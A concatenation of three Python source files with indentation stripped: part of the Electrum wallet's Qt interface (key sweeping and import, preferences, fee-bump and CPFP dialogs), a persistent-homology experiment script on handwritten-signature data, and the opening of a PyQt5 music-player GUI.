for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = QTextEdit()
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet(BLACK_FG if get_address() else RED_FG)
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
try:
tx = self.wallet.sweep(get_pk(), self.network, self.config, get_address(), None)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
self.show_transaction(tx)
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'))
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
try:
index = languages.keys().index(self.config.get("language",''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
self.fee_slider.update()
update_maxfee()
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.is_dynfee())
dynfee_cb.setToolTip(_("Use fees recommended by the server."))
fee_widgets.append((dynfee_cb, None))
dynfee_cb.stateChanged.connect(on_dynfee)
def on_maxfee(x):
m = maxfee_e.get_amount()
if m: self.config.set_key('max_fee_rate', m)
self.fee_slider.update()
def update_maxfee():
d = self.config.is_dynfee()
maxfee_e.setDisabled(d)
maxfee_label.setDisabled(d)
maxfee_label = HelpLabel(_('Max static fee'), _('Max value of the static fee slider'))
maxfee_e = BTCkBEdit(self.get_decimal_point)
maxfee_e.setAmount(self.config.max_fee_rate())
maxfee_e.textChanged.connect(on_maxfee)
update_maxfee()
fee_widgets.append((maxfee_label, maxfee_e))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
rbf_policy = self.config.get('rbf_policy', 1)
rbf_label = HelpLabel(_('Propose Replace-By-Fee') + ':', '')
rbf_combo = QComboBox()
rbf_combo.addItems([_('Always'), _('If the fee is low'), _('Never')])
rbf_combo.setCurrentIndex(rbf_policy)
def on_rbf(x):
self.config.set_key('rbf_policy', x)
rbf_combo.currentIndexChanged.connect(on_rbf)
fee_widgets.append((rbf_label, rbf_combo))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet(GREEN_BG if validated else RED_BG)
else:
alias_e.setStyleSheet(RED_BG)
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.connect(self, SIGNAL('alias_received'), set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet(RED_BG if SSL_error else GREEN_BG if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['BTC', 'mBTC', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1BTC=1000mBTC.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'BTC':
self.decimal_point = 8
elif unit_result == 'mBTC':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(on_unit)
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.disconnect(self, SIGNAL('alias_received'), set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
cb.setEnabled(plugins.is_available(name, self.wallet))
cb.setChecked(p is not None and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(i+1,1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
|
pershom_exp_signatures.py
|
import os
import numpy as np
import random as rand
import pylab as py
import matplotlib.pyplot as plt
import scipy.interpolate
from matplotlib import cm
from lib import helper as hp
from lib.tda import sim_homology
from scipy.interpolate import Rbf, interp1d, interp2d
from typing import List, Set, Dict, Tuple, Optional
from multiprocessing import Process
def top_nat_neighbors(
path: str = "",
array: np.ndarray = np.empty(1),
columns: int = 88
) -> np.ndarray:
"""
Nearest neighbor interpolation.
Returns the original data with augmented nearest neighbors.
:param path: Path to the desired CSV-file.
:param column: Columns to be processed, beginning from the first.
:return:
"""
try:
if len(path) > 0:
data = hp.read_data(path, columns)
else:
data = array
except ValueError:
print("Oops! That was no valid number. Try again ...")
x, y = np.empty(0), np.empty(0)
for i in data:
if np.isfinite(i[0]) and np.isfinite(i[1]):
x = np.append(x, i[0])
y = np.append(y, i[1])
xx = np.linspace(np.min(x), np.max(x), len(x))
f = interp1d(x, y, kind="nearest")
new_data = []
for i in range(0, len(xx)):
new_data.append([xx[i], f(xx[i])])
new_data.append([x[i], y[i]])
return np.array(new_data)
def proc_signatures(dir: str, delimiter: str = ",", iterations: int = 5):
"""
Processes the experiment for the signature dataset.
Insert the directory to the MOBISID dataset: https://ms.sapientia.ro/~manyi/mobisig.html.
:param dir: Path to the directory.
:param delimiter: Delimiter used to save the csv file.
:proc: Directory.
"""
subdirectories = os.listdir(dir)
for user_folder in subdirectories:
if "USER" in user_folder:
path = os.path.abspath(dir + "/" + user_folder)
filepaths = os.listdir(path)
for file in filepaths:
temp_data = top_nat_neighbors(
path=dir + "/" + user_folder + "/" + file, columns=2
)
for j in range(0, iterations):
temp_data = top_nat_neighbors(array=temp_data, columns=2)
np.savetxt(
dir
+ "/"
+ "natneighbor"
+ "/"
+ user_folder
+ "/"
+ "it_"
+ str(j)
+ "_"
+ file,
temp_data,
delimiter=delimiter,
)
def create_distance_file(
orig_path: str,
interpol_path: str,
savefile: bool = True,
type: ["wasserstein", "bottleneck"] = "wasserstein",
filtration: ["alpha", "rips", "witness"] = "rips",
amount_of_files: int = 100
) -> np.ndarray:
"""
Creates from two directories with corresponding named CSV-files a bottleneck-distance comparison.
This code relies on the naming of the directories.
The structure should be: MOBISIG/USERX/file.csv and MOBISIG_natneighbor/USERX/file.csv for a good naming of the .csv rows.
:param orig_path: Path to the original MOBISIG-files.
:param interpol_path: Path tot the interpolated MOBISIG-files.
:param savefile: Whether to save the bottleneck distances into a file or not (npy-format).
:param amount_of_files: Amount of files to be processed.
:return: np.ndarray with bottleneck distances.
"""
def diff(first, second):
"""
Computes the difference of two list objects.
:param first: First list.
:param second: Second list.
:return: List difference.
"""
second = set(second)
return [item for item in first if item not in second]
original_data, interpolated_data, files_to_ignore = [], [], []
for dirpath, dirnames, filenames in os.walk(orig_path):
for filename in filenames:
files_to_ignore.append(os.path.join(dirpath, filename))
break
for dirpath, dirnames, filenames in os.walk(orig_path):
for filename in filenames:
original_data.append(os.path.join(dirpath, filename))
for dirpath, dirnames, filenames in os.walk(interpol_path):
for filename in filenames:
interpolated_data.append(os.path.join(dirpath, filename))
original_data = diff(original_data, files_to_ignore)
interpolated_data = diff(interpolated_data, files_to_ignore)
for i in original_data:
matching = [s for s in interpolated_data if i[20:] in s]
matching.sort()
for j in matching:
distance = sim_homology.persistence_distance(i, j, filtration=filtration, type=type)
with open("results/" + filtration + "_" + type + ".csv", "a") as fd:
fd.write(
i[20 : len(i) - 4]
+ ","
+ j[32 : len(j) - 4]
+ ","
+ str(distance)
+ "\n"
)
print(
"File with name "
+ j
+ " has been compared to "
+ i
+ ". The " + type + "distance is "
+ str(distance)
+ "."
)
def run_in_parallel(*fns):
"""
Runs several functions in parallel.
:param fns: Several functions.
:return: A nice message.
"""
proc = []
for fn in fns:
p = Process(target=fn)
p.start()
proc.append(p)
for p in proc:
p.join()
return print("Processing finished!")
########################################################################################################################
""" RUN THE DISTANCES
run_in_parallel(
create_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="rips", type="wasserstein"),
create_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="alpha", type="wasserstein"),
create_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="witness", type="wasserstein"),
create_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="rips", type="bottleneck"),
create_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="alpha", type="bottleneck"),
create_distance_file("data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="witness", type="bottleneck")
)
"""
########################################################################################################################
|
gui.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import threading
from collections import deque
from math import ceil
from random import shuffle
import qdarkstyle
import requests
from PyQt5 import QtCore, QtGui
from PyQt5.QtCore import QSize, pyqtSignal, QRectF, Qt, QPoint, QTimer
from PyQt5.QtGui import QIcon, QPixmap, QPainter, QImage, QColor, QPen, QBrush
from PyQt5.QtWidgets import (QWidget, QLabel, QPushButton, QApplication,
QSizePolicy, QHBoxLayout, QSlider, QGridLayout,
QGraphicsDropShadowEffect, QGraphicsPixmapItem,
QGraphicsScene, QListWidget, QListWidgetItem, QStyledItemDelegate,
QMenu, QDialog, QLineEdit, QVBoxLayout, QFrame, QMessageBox,
QMainWindow, QProxyStyle, QStyle, QDockWidget,
QStackedWidget)
from src.settings import SettingsManager
from src._database import DBHandler, DBSong, attribute_names
from src.downloader import DownloaderPool
from src.globals import GV
from src.gui.table_view import SQLAlchemyTableModel, Column, SongTable
from src.keybinds import KeyBinds, KeyBind, KeyCodes
from src.metadata import MetadataUpdater
from src.player import GUIPlayer
from src.session import SessionManager
from src.song import Song
from src.utils import parse_duration, at_exit, run_on_exit, run_funcs_on_exit
class Icons:
IconDir = os.path.join(os.getcwd(), 'icons')
if 'app' in locals():
FullStar = QPixmap(os.path.join(IconDir, 'star_white.png'))
HalfStar = QPixmap(os.path.join(IconDir, 'star_half_white.png'))
EmptyStar = QPixmap(os.path.join(IconDir, 'star_border.png'))
Menu = QIcon(os.path.join(IconDir, 'menu.png'))
else:
FullStar = None
HalfStar = None
EmptyStar = None
Menu = None
@classmethod
def create_icons(cls):
Icons.FullStar = QPixmap(os.path.join(Icons.IconDir, 'star_white.png'))
Icons.HalfStar = QPixmap(os.path.join(Icons.IconDir, 'star_half_white.png'))
Icons.EmptyStar = QPixmap(os.path.join(Icons.IconDir, 'star_border.png'))
Icons.Menu = QIcon(os.path.join(Icons.IconDir, 'menu.png'))
class DurationSlider(QSlider):
def __init__(self, on_pos_change):
super().__init__()
self.setSingleStep(0)
self.setPageStep(0)
self.dragging = False
self.on_change = on_pos_change
def mousePressEvent(self, event):
super().mousePressEvent(event)
if event.button() == 1:
self.setSliderPosition(int(event.x() / self.width() * self.maximum()))
def mouseMoveEvent(self, event):
if int(event.buttons()) == 1:
self.dragging = True
self.setSliderPosition(int(event.x() / self.width() * self.maximum()))
def mouseReleaseEvent(self, event):
super().mouseReleaseEvent(event)
if event.button() == 1:
self.dragging = False
self.on_change(self)
def apply_effect_to_pixmap(src: QPixmap, effect, extent=0, size: QSize=None):
if src.isNull():
return src
scene = QGraphicsScene()
item = QGraphicsPixmapItem()
item.setPixmap(src)
item.setGraphicsEffect(effect)
scene.addItem(item)
size = src.size() if size is None else size
res = QImage(size + QSize(extent * 2, extent * 2), QImage.Format_ARGB32)
res.fill(Qt.transparent)
ptr = QPainter(res)
scene.render(ptr, QRectF(), QRectF(-extent, -extent, size.width() + extent * 2, size.height() + extent*2))
return res
class MediaButton(QPushButton):
hovered = pyqtSignal('QEnterEvent')
left = pyqtSignal('QEvent')
mouse_hovered = False
def __init__(self, icon, on_click, size, *args):
super().__init__(*args)
self.setIconSize(QSize(*[int(x * 0.85) for x in size]))
self.set_icon(icon)
self.setStyleSheet(self.stylesheet())
self.setMask(QtGui.QRegion(QtCore.QRect(0, 0, *[int(x*0.95) for x in size]), QtGui.QRegion.Ellipse))
self.setFixedSize(*size)
self.src = icon
self.mouse_hovered = False
self.on_click = lambda x: on_click(self)
self.clicked.connect(self.on_click)
self.setMouseTracking(True)
self.hovered.connect(lambda x: self.mouse_hover(x))
self.left.connect(lambda x: self.mouse_leave(x))
def enterEvent(self, event):
self.hovered.emit(event)
def leaveEvent(self, event):
self.left.emit(event)
def mouse_hover(self, event):
self.mouse_hovered = True
self.set_icon(self.icon(), True)
def mouse_leave(self, event):
self.mouse_hovered = False
self.set_icon(self.icon(), False)
@staticmethod
def set_glow(src):
effect = QGraphicsDropShadowEffect()
effect.setBlurRadius(50)
effect.setOffset(0, 0)
effect.setEnabled(True)
effect.setColor(QColor('#0000CC'))
image = apply_effect_to_pixmap(QPixmap(src), effect)
icon = QIcon(QPixmap().fromImage(image))
return icon
def set_icon(self, icon, effect=None):
if effect is None:
effect = self.mouse_hovered
if isinstance(icon, str):
self.src = icon
icon = self.set_glow(icon) if effect else QIcon(icon)
else:
icon = self.set_glow(self.src) if effect else QIcon(self.src)
self.setIcon(icon)
self.setIconSize(self.iconSize())
self.update()
@staticmethod
def stylesheet():
return """
QPushButton:pressed {
background: transparent;
border: none;
}
QPushButton {
background: transparent;
border: none;
}
QPushButton:disabled {
background: transparent;
}"""
class MediaControls(QHBoxLayout):
def __init__(self, player_):
super().__init__()
self.player = player_
self.player.duration_fn = self.update_duration
self.player.on_start = self.player_start
self.seek_lock = threading.Lock()
self.playing = False
self.current = None
size_policy = QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
size = (35, 35)
play = MediaButton('icons/play_white.png', self.play_pause, size)
self.play = play
next_button = MediaButton('icons/next_white.png', self.next, size)
previous = MediaButton('icons/previous_white.png', self.previous, size)
play.setSizePolicy(size_policy)
next_button.setSizePolicy(size_policy)
previous.setSizePolicy(size_policy)
self.addWidget(previous)
self.addWidget(play)
self.addWidget(next_button)
mid_layout = QGridLayout()
self.title = QLabel()
self.title.setStyleSheet('QLabel { font-weight: bold; }')
self.rating = RatingBar(on_change=self.change_rating)
